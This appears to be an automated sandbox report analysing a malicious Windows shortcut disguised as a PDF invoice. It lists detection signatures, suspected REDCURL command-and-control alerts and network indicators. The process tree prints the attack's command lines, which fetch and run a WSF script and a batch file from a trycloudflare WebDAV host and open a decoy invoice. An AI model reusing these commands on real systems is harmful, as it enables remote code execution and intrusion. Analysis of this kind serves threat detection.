Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DE-10192.pdf.lnk.download.lnk

Overview

General Information

Sample name:DE-10192.pdf.lnk.download.lnk
Analysis ID:1637112
MD5:d13c6bf0d56449fd952a8e26bb040fae
SHA1:ceff34eda87c7d4b9bc002fa600f025d003963b1
SHA256:27af6b46ac4297ad0921f014d756acb7cdecfd01cc00c746d04ac8855ebe5a99
Tags:lnkWsgiDAVuser-JAMESWT_MHT
Infos:

Detection

Score:92
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Gathers information about network shares
Joe Sandbox ML detected suspicious sample
Opens network shares
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected non-DNS traffic on DNS port
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Password Provided In Command Line Of Net.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64
  • cmd.exe (PID: 1488 cmdline: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cscript.exe (PID: 7300 cmdline: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf" MD5: 24590BF74BBBBFD7D7AC070F4E3C44FD)
      • cmd.exe (PID: 7348 cmdline: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chrome.exe (PID: 7492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf MD5: E81F54E6C1129887AEA47E7D092680BF)
          • chrome.exe (PID: 7752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2016,i,15765900008559282355,18116320672109493881,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2032 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
        • net.exe (PID: 7508 cmdline: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
        • net.exe (PID: 1900 cmdline: net use Z: /delete /yes MD5: 0BD94A338EEA5A4E1F2830AE326E6D19)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe
Source: Process startedAuthor: Tim Shelton (HAWK.IO): Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2528, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 1488, ProcessName: cmd.exe
Source: Process startedAuthor: Michael Haag: Data: Command: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", CommandLine|base64offset|contains: r+, Image: C:\Windows\System32\cscript.exe, NewProcessName: C:\Windows\System32\cscript.exe, OriginalFileName: C:\Windows\System32\cscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1488, ParentProcessName: cmd.exe, ProcessCommandLine: cscript "C:\Users\user\AppData\Local\Temp\coi.wsf", ProcessId: 7300, ProcessName: cscript.exe
Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe
Source: Process startedAuthor: frack113: Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, CommandLine|base64offset|contains: , Image: C:\Windows\System32\net.exe, NewProcessName: C:\Windows\System32\net.exe, OriginalFileName: C:\Windows\System32\net.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7348, ParentProcessName: cmd.exe, ProcessCommandLine: net use Z: "\\nissan-signature-rs-noise.trycloudflare.com@SSL\DavWWWRoot" /user:your-username your-password /persistent:no, ProcessId: 7508, ProcessName: net.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T11:07:23.516929+010020283713Unknown Traffic192.168.2.1049681104.16.230.132443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T11:07:43.255450+010020306971Malware Command and Control Activity Detected192.168.2.1049694104.16.230.132443TCP
2025-03-13T11:07:54.789267+010020306971Malware Command and Control Activity Detected192.168.2.1053124104.16.230.132443TCP
2025-03-13T11:07:57.253235+010020306971Malware Command and Control Activity Detected192.168.2.1053131104.16.230.132443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-13T11:07:24.255409+010018100051Potentially Bad Traffic192.168.2.1049681104.16.230.132443TCP
2025-03-13T11:07:30.002555+010018100051Potentially Bad Traffic192.168.2.1049682104.16.230.132443TCP
2025-03-13T11:07:49.730564+010018100051Potentially Bad Traffic192.168.2.1053106104.16.230.132443TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: DE-10192.pdf.lnk.download.lnkVirustotal: Detection: 11%Perma Link
Source: DE-10192.pdf.lnk.download.lnkReversingLabs: Detection: 13%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 95.1% probability
Source: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53106 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53119 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53124 version: TLS 1.2

Networking

barindex
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:49681 -> 104.16.230.132:443
Source: Network trafficSuricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:53131 -> 104.16.230.132:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:49682 -> 104.16.230.132:443
Source: Network trafficSuricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:53124 -> 104.16.230.132:443
Source: Network trafficSuricata IDS: 1810005 - Severity 1 - Joe Security ANOMALY Microsoft Office WebDAV Discovery : 192.168.2.10:53106 -> 104.16.230.132:443
Source: Network trafficSuricata IDS: 2030697 - Severity 1 - ET MALWARE Suspected REDCURL CnC Activity M1 : 192.168.2.10:49694 -> 104.16.230.132:443
Source: global trafficTCP traffic: 192.168.2.10:53104 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.10:51676 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.10:52734 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox ViewIP Address: 162.159.134.42 162.159.134.42
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.10:49681 -> 104.16.230.132:443
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 104.16.230.132
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.26
Source: unknownTCP traffic detected without corresponding DNS query: 2.23.227.208
Source: global trafficHTTP traffic detected: GET /coi.wsf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: typically-nut-personalized-syndication.trycloudflare.com
Source: global trafficHTTP traffic detected: GET /xo.bat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045translate: fHost: typically-nut-personalized-syndication.trycloudflare.com
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2013/08/draft-invoice-Germany.pdf HTTP/1.1Host: www.healyconsultants.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: www.healyconsultants.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r/gsr1.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Tue, 07 Jan 2025 07:28:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficHTTP traffic detected: GET /r/r4.crl HTTP/1.1Cache-Control: max-age = 3000Connection: Keep-AliveAccept: */*If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMTUser-Agent: Microsoft-CryptoAPI/10.0Host: c.pki.goog
Source: global trafficDNS traffic detected: DNS query: www.healyconsultants.com
Source: global trafficDNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Thu, 13 Mar 2025 10:07:51 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91faba0cab9b0c03-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba0cbcd2345c-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:54 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba1afd616c81-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: cloudflareDate: Thu, 13 Mar 2025 10:07:54 GMTContent-Type: text/htmlContent-Length: 553Connection: closeCF-RAY: 91faba1f5fbee595-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 13 Mar 2025 10:07:56 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeCF-Ray: 91faba297e28f078-DFWCF-Cache-Status: DYNAMICServer: cloudflare
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/O#yX
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/ttings
Source: net.exe, 00000014.00000002.1436671895.000001E265721000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://nissan-signature-rs-noise.trycloudflare.com/ue
Source: net.exe, 00000014.00000002.1436671895.000001E265719000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A099000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdf
Source: net.exe, 00000014.00000002.1436912928.000001E2659F4000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000014.00000002.1436671895.000001E265710000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492189178.000002220A090000.00000004.00000020.00020000.00000000.sdmp, net.exe, 0000001B.00000002.1492228185.000002220A374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healyconsultants.com/wp-content/uploads/2013/08/draft-invoice-Germany.pdfPROCESSOR_ARCHI
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53111 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49685
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 52738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49682
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49681
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53125
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53124
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53123
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53122
Source: unknownNetwork traffic detected: HTTP traffic on port 53124 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53106
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53128
Source: unknownNetwork traffic detected: HTTP traffic on port 53128 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53131
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53130
Source: unknownNetwork traffic detected: HTTP traffic on port 53114 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53131 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53119
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49674
Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53114
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53111
Source: unknownNetwork traffic detected: HTTP traffic on port 53106 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53123 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 52738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53125 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49685 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53122 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49681 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53130 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 53119 -> 443
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49681 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49682 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:49685 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53106 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53119 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.16.230.132:443 -> 192.168.2.10:53124 version: TLS 1.2

System Summary

barindex
Source: DE-10192.pdf.lnk.download.lnkLNK file: /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "%TEMP%\coi.wsf" /Y && cscript "%TEMP%\coi.wsf"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7492_1091332923Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7492_1091332923Jump to behavior
Source: classification engineClassification label: mal92.spyw.evad.winLNK@30/6@6/5
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Contacts\error_log.txtJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7356:120:WilError_03
Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\coi.wsfJump to behavior
Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c \\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\xo.bat
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\cscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: DE-10192.pdf.lnk.download.lnkVirustotal: Detection: 11%
Source: DE-10192.pdf.lnk.download.lnkReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy "\\typically-nut-personalized-syndication.trycloudflare.com@SSL\DavWWWRoot\coi.wsf" "C:\Users\user\AppData\Local\Temp\coi.wsf" /Y && cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Users\user\AppData\Local\Temp\coi.wsf"
